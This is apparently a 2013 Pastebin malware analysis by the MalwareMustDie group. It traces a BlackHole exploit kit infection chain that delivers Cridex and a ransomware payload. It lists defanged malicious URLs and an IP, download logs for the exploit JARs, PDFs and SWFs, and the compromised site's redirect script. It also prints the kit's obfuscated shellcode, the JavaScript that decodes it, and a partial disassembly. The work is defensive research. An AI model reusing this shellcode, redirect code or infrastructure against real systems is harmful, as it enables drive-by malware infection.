API tools faq
paste
Advertisement
MalwareMustDie

#MMD - BlackHole EK w/GeoIP Double infector(Cridex+Ransomer)

MalwareMustDie
Feb 18th, 2013
2,116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 52.61 KB | None | 0 0
raw download clone embed print report
  1. ===================================================
  2. #MalwareMustDie!
  3. BlackHole Exploit Kit with Double infector:
  4. Cridex & FakeAV/Ransomer (depends on your request IP)
  5. Infector: h00p://webworks.investorship.co.jp/page-329.htm
  6. Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
  7. All of the cracked infectors download urls:
  8. //JARS
  9. ..using the applet in the same url as landing page (2 JARS found)
  10. //PDF:
  11. h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  12. h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  13. h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  14. h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  15. //SWF
  16. h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  17. h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  18. h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  19. h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  20. //Payloads:
  21. h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
  22. h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
  23.  
  24. The catches:
  25. --------------
  26. 2013/02/18 15:08 2e9e095f7f276c495a0080b656e81d72 94,208 about.exe
  27. 2013/02/18 15:54 80930719764cb6c41840156800ee54f9 7,981 flash1.swf
  28. 2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash2.swf
  29. 2013/02/18 15:55 80930719764cb6c41840156800ee54f9 7,981 flash3.swf
  30. 2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash4.swf
  31. 2013/02/18 14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1 13,873 java1.jar
  32. 2013/02/18 14:33 36df7f936b42abe2ccff75544f08f9f2 12,968 java2.jar
  33. 2013/02/18 13:54 96c6c9a9346a360d07236d5bd021adc1 434 page-329.htm
  34. 2013/02/18 15:50 6cfb52ab36855801313742a90593c6ec 20,161 pdf1.pdf
  35. 2013/02/18 15:50 40e02231bf9ffe321289cccae0191fd4 11,194 pdf2.pdf
  36. 2013/02/18 15:51 a57fcffb1040048e63b9f81b6ec096bf 20,161 pdf3.pdf
  37. 2013/02/18 15:52 df86cbbc78748287e62be9a1248711ea 11,160 pdf4.pdf
  38. 2013/02/18 14:13 b5de89429d354f138d59673e88907b3b 118,326 public_version-2..php
  39. 2013/02/18 14:16 a5acd12a633e01d575976de4423b8642 118,301 public_version.php
  40. 2013/02/18 15:08 04e9d4167c9a1b82e622e04ad85f8e99 279,040 readme.exe
  41. -----
  42. Total: 2 SWF, 4 PDF, 2 Jars, 2 Payloads
  43.  
  44. Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
  45. =================================================================
  46.  
  47. // infector:
  48.  
  49. h00p://webworks.investorship.co.jp/page-329.htm
  50.  
  51. --2013-02-18 14:11:12-- h00p://webworks.investorship.co.jp/page-329.htm
  52. Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
  53. Caching webworks.investorship.co.jp => 117.20.100.110
  54. Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
  55. :
  56. GET /page-329.htm h00p/1.0
  57. Host: webworks.investorship.co.jp
  58. h00p request sent, awaiting response...
  59. :
  60. h00p/1.1 200 OK
  61. Date: Mon, 18 Feb 2013 05:11:05 GMT
  62. Server: Apache
  63. Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
  64. ETag: "1185062d-1b2-5121b3f6"
  65. Accept-Ranges: bytes
  66. Content-Length: 434
  67. Connection: close
  68. Content-Type: text/html
  69. :
  70. 200 OK
  71. Length: 434 [text/html]
  72. Saving to: `page-329.htm'
  73. 2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]
  74.  
  75.  
  76. //-------cat---------------
  77.  
  78. <html>
  79. <head>
  80. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  81. <title>Please wait</title>
  82. </head>
  83. <body>
  84. <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
  85. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  86.  
  87.  
  88. <script>
  89. var1=49;
  90. var2=var1;
  91. if(var1==var2) {document.location="h00p://46.175.224.21:8080/forum/links/public_version.php";}
  92. </script>
  93.  
  94.  
  95. </body>
  96. </html>
  97.  
  98. // -----------landing page/is a BHEK moronz.----------------------
  99.  
  100.  
  101. --2013-02-18 14:13:40-- h00p://46.175.224.21:8080/forum/links/public_version.php
  102. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  103. :
  104. GET /forum/links/public_version.php http/1.0
  105. Referer: h00p://webworks.investorship.co.jp/page-329.htm
  106. Host: 46.175.224.21:8080
  107. http request sent, awaiting response...
  108. :
  109. Server: nginx/1.0.10
  110. Date: Mon, 18 Feb 2013 05:13:34 GMT
  111. Content-Type: text/html; charset=CP-1251
  112. Connection: keep-alive
  113. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  114. Vary: Accept-Encoding
  115.  
  116. http/1.1 200 OK
  117. Server: nginx/1.0.10
  118. Date: Mon, 18 Feb 2013 05:16:04 GMT
  119. Content-Type: text/html; charset=CP-1251
  120. Connection: close
  121. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  122. Vary: Accept-Encoding
  123. 200 OK
  124. Length: unspecified [text/html]
  125. Saving to: `public_version.php'
  126. 2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]
  127.  
  128.  
  129. // -----------------checks the jars..---------------------
  130.  
  131.  
  132. // get java old....
  133.  
  134. --2013-02-18 14:31:39-- h00p://46.175.224.21:8080/forum/links/public_version.php
  135. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  136. :
  137. GET /forum/links/public_version.php http/1.0
  138. User-Agent: Java/1.6.0_23
  139. Host: 46.175.224.21:8080
  140. h00p request sent, awaiting response...
  141. :
  142. h00p/1.1 200 OK
  143. Server: nginx/1.0.10
  144. Date: Mon, 18 Feb 2013 05:31:33 GMT
  145. Content-Type: application/java-archive
  146. Connection: keep-alive
  147. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  148. Content-Length: 13873
  149. ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
  150. Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
  151. Accept-Ranges: bytes
  152. :
  153. 200 OK
  154. Length: 13873 (14K) [application/java-archive]
  155. Saving to: `java1.jar'
  156. 2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]
  157.  
  158.  
  159. // get java newer...
  160.  
  161. --2013-02-18 14:33:22-- h00p://46.175.224.21:8080/forum/links/public_version.php
  162. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  163. :
  164. GET /forum/links/public_version.php http/1.0
  165. User-Agent: Java/1.7.0_09
  166. Host: 46.175.224.21:8080
  167. h00p request sent, awaiting response...
  168. :
  169. h00p/1.1 200 OK
  170. Server: nginx/1.0.10
  171. Date: Mon, 18 Feb 2013 05:33:15 GMT
  172. Content-Type: application/java-archive
  173. Connection: keep-alive
  174. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  175. Content-Length: 12968
  176. ETag: "36df7f936b42abe2ccff75544f08f9f2"
  177. Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
  178. Accept-Ranges: bytes
  179. :
  180. 200 OK
  181. Length: 12968 (13K) [application/java-archive]
  182. Saving to: `./java2.jar'
  183. 2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]
  184.  
  185.  
  186. // -------------------------------------------------------
  187.  
  188. // see both plugin-detects....
  189. // it has different shellcodes... two payloads...
  190. // has 2 PDF, 2 SWF, 2 JARS each payload
  191. // PD1.txt : http://pastebin.com/raw.php?i=CpRXS5m3
  192. // and PD2.txt : http://pastebin.com/raw.php?i=MkYVRz4R
  193. // ==========================================================================
  194.  
  195. // ========================================
  196. // get the deobs + crack both shellcodes:
  197. // ========================================
  198.  
  199. var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
  200. var xxx= a["replace"](/\%!/g, "%" + "u");
  201. document.write(xxx);
  202.  
  203. var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
  204. var yyy= b["replace"](/\%!/g, "%" + "u");
  205. document.write("\n\n"+yyy);
  206.  
  207. // output:
  208.  
  209. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028
  210.  
  211. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028
  212.  
  213.  
  214. // ========================
  215. // shellcode analysis...
  216. // ========================
  217.  
  218. // break the eggs... no text...one time...
  219.  
  220. // raws...
  221. 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e46191512404219191212421a1b19120e4e4d42191512421b1b1b12121a44191912124f41191912124746191912124741195c0e19150e4351475815420e154028410028
  222.  
  223. // view...
  224. 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
  225. e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
  226. ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
  227. 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
  228. a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
  229. af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
  230. 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
  231. 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
  232. f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
  233. 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
  234. 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
  235. 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
  236. d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
  237. 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
  238. d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
  239. ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
  240. 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
  241. 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
  242. d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
  243. 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
  244. 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
  245. 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
  246. 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
  247. 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
  248. d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
  249. 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
  250. 58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
  251. 1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
  252. 07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
  253. 5a 5b 41 47 46 06 58 40 58 17 5c 4e 15 1b 18 12 Z[AGF.X@X.\N....
  254. 19 46 12 19 41 12 19 41 12 1b 1b 0e 5f 4d 15 1a .F..A..A...._M..
  255. 5e 12 19 43 12 19 45 12 1b 1a 12 1b 1b 12 19 43 ^..C..E........C
  256. 12 19 43 12 1b 19 12 19 42 12 19 47 0e 59 15 19 ..C.....B..G.Y..
  257. 43 0e 45 40 15 58 0e 5e 5e 15 5a 28 28 00 C.E@.X.^^.Z((.
  258.  
  259. //disasm..
  260. 00000000 41 inc ecx
  261. 00000001 41 inc ecx
  262. 00000002 41 inc ecx
  263. 00000003 41 inc ecx
  264. 00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
  265. 00000008 EBFC jmp short 0x6 ; loop
  266. 0000000A 58 pop eax
  267. 0000000B 10C9 adc cl,cl
  268. 0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
  269. 00000013 FE db 0xfe
  270. 00000014 2830 sub [eax],dh ; math
  271. 00000016 E240 loop 0x58 ; loop
  272. 00000018 EBFA jmp short 0x14 ; loop
  273. 0000001A E805FFEBFF call dword 0xffebff24 ; call
  274. 0000001F FFCC dec esp
  275. 00000021 AD lodsd
  276. 00000022 1C5D sbb al,0x5d
  277. 00000024 77C1 ja 0xffffffe7
  278. 00000026 E81BA34C18 call dword 0x184ca346 ; call
  279. 0000002B 6868A3A324 push dword 0x24a3a368
  280. 00000030 3458 xor al,0x58 ; decryption
  281. 00000032 A37E205EF3 mov [0xf35e207e],eax
  282. 00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
  283. 0000003D 2B041B sub eax,[ebx+ebx] ; math
  284. 00000040 C6 db 0xc6
  285. 00000041 A9383DD7D7 test eax,0xd7d73d38
  286. 00000046 A39018686E mov [0x6e681890],eax
  287. 0000004B EB2E jmp short 0x7b ; loop
  288. 0000004D 11D3 adc ebx,edx
  289. 0000004F 5D pop ebp
  290. 00000050 1CAF sbb al,0xaf
  291. 00000052 AD lodsd
  292. 00000053 0C5D or al,0x5d
  293. 00000055 CC int3
  294. 00000056 C17964C3 sar dword [ecx+0x64],0xc3
  295. 0000005A 7E79 jng 0xd5
  296. 0000005C 5D pop ebp
  297. 0000005D A3A3141D5C mov [0x5c1d14a3],eax
  298. 00000062 2B507E sub edx,[eax+0x7e] ; math
  299. 00000065 DD5EA3 fstp qword [esi-0x5d]
  300. 00000068 2B08 sub ecx,[eax] ; math
  301. 0000006A 1BDD sbb ebx,ebp
  302. 0000006C 61 popad
  303. 0000006D E1D4 loope 0x43
  304. 0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
  305. 00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
  306. 0000007C E3E9 jecxz 0x67
  307. 0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
  308. 00000084 37 aaa
  309. 00000085 13CE adc ecx,esi
  310. 00000087 5D pop ebp
  311. 00000088 A3760C76F5 mov [0xf5760c76],eax
  312. 0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
  313. 00000093 A5 movsd
  314. 00000094 D7 xlatb
  315. 00000095 C40C7C les ecx,[esp+edi*2]
  316. 00000098 A3242BF0A3 mov [0xa3f02b24],eax
  317. 0000009D F5 cmc
  318. 0000009E A32CED2B76 mov [0x762bed2c],eax
  319. 000000A3 83EB71 sub ebx,byte +0x71 ; math
  320. 000000A6 7BC3 jpo 0x6b
  321. 000000A8 A385084055 mov [0x55400885],eax
  322. 000000AD A81B test al,0x1b
  323. 000000AF 242B and al,0x2b
  324. 000000B1 5C pop esp
  325. 000000B2 C3 ret
  326. 000000B3 BEA3DB2040 mov esi,0x4020dba3
  327. 000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
  328. 000000BE D7 xlatb
  329. 000000BF B0D7 mov al,0xd7
  330. 000000C1 D7 xlatb
  331. 000000C2 D1CA ror edx,1 ; bitwise cipher
  332. 000000C4 28C0 sub al,al ; math
  333. 000000C6 2828 sub [eax],ch ; math
  334. 000000C8 7028 jo 0xf2
  335. 000000CA 42 inc edx
  336. 000000CB 7840 js 0x10d
  337. 000000CD 6828D72828 push dword 0x2828d728
  338. 000000D2 AB stosd
  339. 000000D3 7831 js 0x106
  340. 000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
  341. 000000DA 76A3 jna 0x7f
  342. 000000DC AB stosd
  343. 000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
